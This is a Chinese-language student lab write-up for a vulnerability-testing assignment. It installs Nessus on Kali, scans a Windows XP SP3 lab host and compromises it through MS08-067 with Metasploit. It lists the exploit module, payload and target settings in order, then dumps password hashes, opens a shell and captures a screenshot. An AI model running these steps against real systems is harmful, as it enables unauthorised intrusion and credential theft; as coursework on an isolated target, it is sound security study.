avatar

漏洞测试作业八:攻破XP
  • kali linux
  • nessus
  • metasploit
  • ms08_067利用

题目

在KALI中安装NESSUS,对目标XP SP3主机进行扫描;根据扫描得到的漏洞结果利用metasploit框架(命令行模式)完成利用,对XP主机(关闭系统的安全防护措施)实施渗透攻击:

(1)熟练掌握metasploit中的常见指令

(2)攻击效果应该能获取XP主机的屏幕截图(屏幕截图个性化,比如用记事本打开输入个人学号等信息),并将截图作为实验报告的一部分提交

(3)Armitage工具的渗透过程可以基于命令行的操作基础上自己实践

解答

(0) Nessus安装

软件安装

https://www.tenable.com/downloads/nessus下载对应安装包,本人使用的是61为kali linux,下载的是image-20200517163539088

# 解压安装包
sudo dpkg -i Nessus-8.10.0-debian6_amd64.deb
# 启动服务
/etc/init.d/nessusd start
# 查看服务
sudo netstat -ntpl | grep nessus

image-20200519163250802

表示安装成功

配置

在浏览器中输入https://localhost:8834/,点击```Advanced```,根据提示输入激活码,设置账户root,密码123456

image-20200519164230839image-20200519164404837

使用浏览器更新插件易出现卡死情况,这时候需要用命令行手动更新

sudo /opt/nessus/sbin/nessuscli update --plugins-only

重启服务

sudo /etc/init.d/nessusd restart

安装成功

image-20200519215331129 image-20200519215636880

(1) metasploit常见指令

指令 解释
back 跳出当前模块
show exploits 显示metasploit框架中所有课用的渗透攻击模块
主动型exploits能够直接连接并攻击特定主机
被动性exploits等待主机连接之后对其进行渗透攻击
show auxiliary 显示所有的辅助模块以及它们的用途
Metasploit中,辅助模块可以是扫描器、拒绝服务攻击工具、Fuzz测试器以及其它类型的工具
show options 参数options是保证框架哥哥模块正确运行所需要的各种设置,这个命令会列出所需参数
show payloads 攻击载荷是针对特定平台的一段攻击代码,他将通过网络传送到攻击目标进行执行
use 找到攻击模块或者payloads后,可以使用use命令加载模块
show targets 列出受到漏洞影响的目标系统的类型
info info+模块名 给出此模块的详细信心、参数说明以及所有课用的目标操作系统
check 检测目标主机是否存在指定漏洞
set 针对某个参数进行设置(同时启动该参数)
unset 禁用相关参数

(2) 扫描目标XP SP3主机

查看xp的ip地址

image-20200519172427020

得到ip地址: 192.168.89.141

使用nessus扫描

new scan -> advanced scan

image-20200519220049513

点击saveimage-20200520172918075启动扫描

下面利用漏洞ms08_067

使用metasploit

==xp关闭防火墙并打开445端口==
telnet 192.168.89.141 445

image-20200520205402500445端口打开

image-20200520205451056445端口关闭

(本系统的445端口默认关闭)

image-20200520205606131防火墙和自动更新已关闭

打开metasploit
image-20200519220205462
查看对应漏洞相关攻击模块
search ms08_067

image-20200520193348371

选定要进行渗透的攻击模块
use exploit/windows/smb/ms08_067_netapi

image-20200520193654664

查看模块有关选项
show options

image-20200520194020076

设定攻击目标
set RHOST 192.168.89.141

image-20200520194221871

开始攻击
exploit

image-20200520210231512

攻击成功

image-20200520210303096
利用漏洞对目标主机进行控制
show payloads
image-20200520210905926
使用正向连接shell
set payload windows/meterpreter/bind_tcp

image-20200520211948981

show options查看该攻击载荷有无其它要求

设置系统版本号

XP sp3 中文简体办->34

set target 34
攻击
exploit

image-20200520212928849

攻击成功

得到用户信息
hashdump

image-20200520213231876

获取目标主机的控制权
shell
image-20200520213432872
浏览目标主机目录
image-20200520213543124
退回meterpreter

image-20200520213721875

屏幕快照
screenshot
image-20200520214041538 image-20200521160637123
Author: Michelle19l
Link: https://gitee.com/michelle19l/michelle19l/2020/05/21/漏测作业/漏测作业八/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
Donate
  • 微信
    微信
  • 支付寶
    支付寶